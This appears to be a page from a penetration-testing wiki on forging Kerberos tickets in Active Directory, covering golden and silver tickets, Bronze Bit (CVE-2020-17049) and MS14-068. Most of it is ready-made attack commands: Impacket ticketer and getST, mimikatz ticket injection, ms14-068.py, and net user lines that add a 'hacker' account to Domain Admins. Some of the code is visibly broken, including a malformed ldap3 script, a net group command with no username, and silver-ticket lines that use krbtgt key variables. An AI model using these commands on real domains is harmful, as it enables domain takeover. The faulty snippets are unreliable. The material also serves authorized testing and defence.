Forged tickets
MITRE ATT&CK™ Sub-techniques T1558.001 and T1558.002

Theory

Silver and Golden tickets are forged Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.
    Golden ticket: The NT hash (when the RC4 etype is not disabled, or any other Kerberos DES or AES key when it is) of the special account krbtgt can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain. In practice, the krbtgt's key is used to encrypt, among other things, the PAC (Privilege Authentication Certificate), a special set of information about the requesting user that the KDC (Key Distribution Center) will copy/paste in the ST the users requests.
    Silver ticket: The NT hash (when the RC4 etype is not disabled, or any other Kerberos DES or AES key when it is) of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service. In practice, the key is used to encrypt, among other things, the PAC (Privilege Authentication Certificate), a special set of information about the requesting user that the target service will decrypt and read to decide if the user can have access.
The Bronze bit vulnerability (CVE-2020-17049) introduced the possibility of forwarding service tickets when it shouldn't normally be possible (protected users, unconstrained delegation, constrained delegation configured with protocol transition).

Practice

The following parts allow to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.
For Golden and Silver tickets, it's important to remember that, by default, ticketer and mimikatz forge tickets containing PACs that say the user belongs to some well-known administrators groups (i.e. group ids 513, 512, 520, 518, 519). There are scenarios where these groups are not enough (special machines where even Domain Admins don't have local admin rights).
In these situations, testers can either look for the domain groups that have local administrator privileges on the target machine, or specify all the groups ids when creating the ticket.
Nota bene: Deny ACEs could actually prevent the second solution from working. Encountering a Deny ACE preventing domain admins to log on could be an issue when having all groups ids in the ticket, including the domain admin group id.
When forging tickets, only the user-id and groups-ids are useful. The username supplied is mostly useless.

Golden ticket

In order to craft a golden ticket, testers need to find the krbtgt's NT hash or AES key (128 or 256 bits). In most cases, this can only be achieved with domain admin privileges through a DCSync attack. Because of this, golden tickets only allow lateral movement and not privilege escalation.
Microsoft now uses AES 256 bits by default. Using this encryption algorithm (instead of giving the NThash) will be stealthier.
UNIX-like
Windows
There are Impacket scripts for each step of a golden ticket creation : retrieving the krbtgt, retrieving the domain SID, creating the golden ticket.
1
# Find the domain SID
2
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/[email protected]' 0
3
4
# Create the golden ticket (with an RC4 key, i.e. NT hash)
5
ticketer.py -nthash $krbtgtNThash -domain-sid $domainSID -domain $DOMAIN randomuser
6
7
# Create the golden ticket (with an AES 128/256bits key)
8
ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
9
10
# Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids
11
ticketer.py -nthash $krbtgtNThash -domain-sid $domainSID -domain $DOMAIN -user-id $USERID -groups $GROUPID1,$GROUPID2,... randomuser
Copied!
On Windows, mimikatz (C) can be used for this attack.
1
# with an NT hash
2
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt
3
4
# with an AES 128 key
5
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt
6
7
# with an AES 256 key
8
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt
Copied!
For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Silver ticket

In order to craft a silver ticket, testers need to find the target service account's NT hash or AES key (128 or 256 bits).
"While the scope is more limited than Golden Tickets, the required hash is easier to get and there is no communication with a DC when using them, so detection is more difficult than Golden Tickets." (adsecurity.org)
UNIX-like
Windows
The Impacket script ticketer can create silver tickets.
1
# Find the domain SID
2
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/[email protected]' 0
3
4
# with an NT hash
5
python ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username
6
7
# with an AES (128 or 256 bits) key
8
python ticketer.py -aesKey $AESkey -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username
Copied!
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
On Windows, mimikatz can be used to generate a silver ticket. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.
1
# with an NT hash
2
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
3
4
# with an AES 128 key
5
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
6
7
# with an AES 256 key
8
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
Copied!
For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Bronze bit (CVE-2020-17049)

In order to exploit this vulnerability, attackers need to find a service able to delegate to another service (see Kerberos delegations), and they need that first service account Kerberos key (NT hash or AES key, 128 or 256 bits).
For example with constrained delegation set between a controlled service and a target one with protocol transition enabled and the target user being protected, the Impacket script getST (Python) can perform all the necessary steps to obtain the final "impersonating" ST (in this case, "Administrator" is impersonated/delegated account but it can be any user in the environment).
The input credentials are those of the compromised service account configured with constrained delegations.
1
# with an NT hash
2
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account
3
4
# with an AES (128 or 256 bits) key
5
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -aesKey $Controlled_service_AES_key $Domain/$Controlled_service_account
Copied!
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).

MS14-068 (CVE-2014-6324)

This vulnerability allows attackers to forge a TGT with unlimited power (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the golden ticket, however, it doesn't require the attacker to know the krbtgt. This attack is a really powerful privilege escalation technique. However, it will not work on patched domain controllers.
pykek
🛠️ Windows
This attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.
Referring to kekeo's wiki might also help untangle some situations but errors like KDC_ERR_SUMTYPE_NOSUPP (15) or KRB_ERR_GENERIC (60) when trying to use the generated .ccache ticket mean the target is patched.
In order to operate the attack, knowing a domain account’s name, it’s password and it’s SID are needed. The SID can be obtained with the following script.
1
import ldap3
2
3
target_dn = "DC=domain,DC=local"
4
domain = "domain.com"
5
username = "username"
6
password = "password"
7
8
user = "{}\\{}".format(domain, username)
9
server = ldap3.Server
10
connection = ldap3.Connection(server=server, user=user, password=password, authentication authentication=ldap3.NTLM)
11
connection.bind()
12
connection.search(target_dn, "(samaccountname={})".format(username), attributes=["objectsid"])
13
print(connection.entries)
Copied!
A TGT can then be obtained with one of the following commands.
1
# with a plaintext password
2
ms14-068.py -u 'USER'@'DOMAIN_FQDN' -p 'PASSWORD' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'
3
4
# with pass-the-hash
5
ms14-068.py -u 'USER'@'DOMAIN_FQDN' --rc4 'NThash' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'
Copied!
Once the .ccache TGT is obtained, if the attack is successful, the ticket will be usable with pass-the-ticket. An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's getST.py (Python).
1
getST.py -k -no-pass -spn 'any_valid_spn' $DOMAIN_FQDN/$USER
Copied!
In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's kerberos:ptt command, and then create a new user and add it to the domain admins group.
1
net user "hacker" "132Pentest!!!" /domain /add
2
net group "Domain Admins" /domain /add
Copied!
Metasploit Framework can also be useful in the it prints valuable error information.
1
msf6 > use admin/kerberos/ms14_068_kerberos_checksum
Copied!
kekeo

References

Silver & Golden Tickets
hackndo
How Attackers Use Kerberos Silver Tickets to Exploit Systems
Active Directory Security
Kerberos & KRBTGT: Active Directory’s Domain Kerberos Service Account
Active Directory Security
Kerberos in Active Directory
hackndo
CVE-2020-17049: Kerberos Bronze Bit Attack - Overview
NetSPI
Digging into MS14-068, Exploitation and Defence
F-Secure Labs
Last modified 22d ago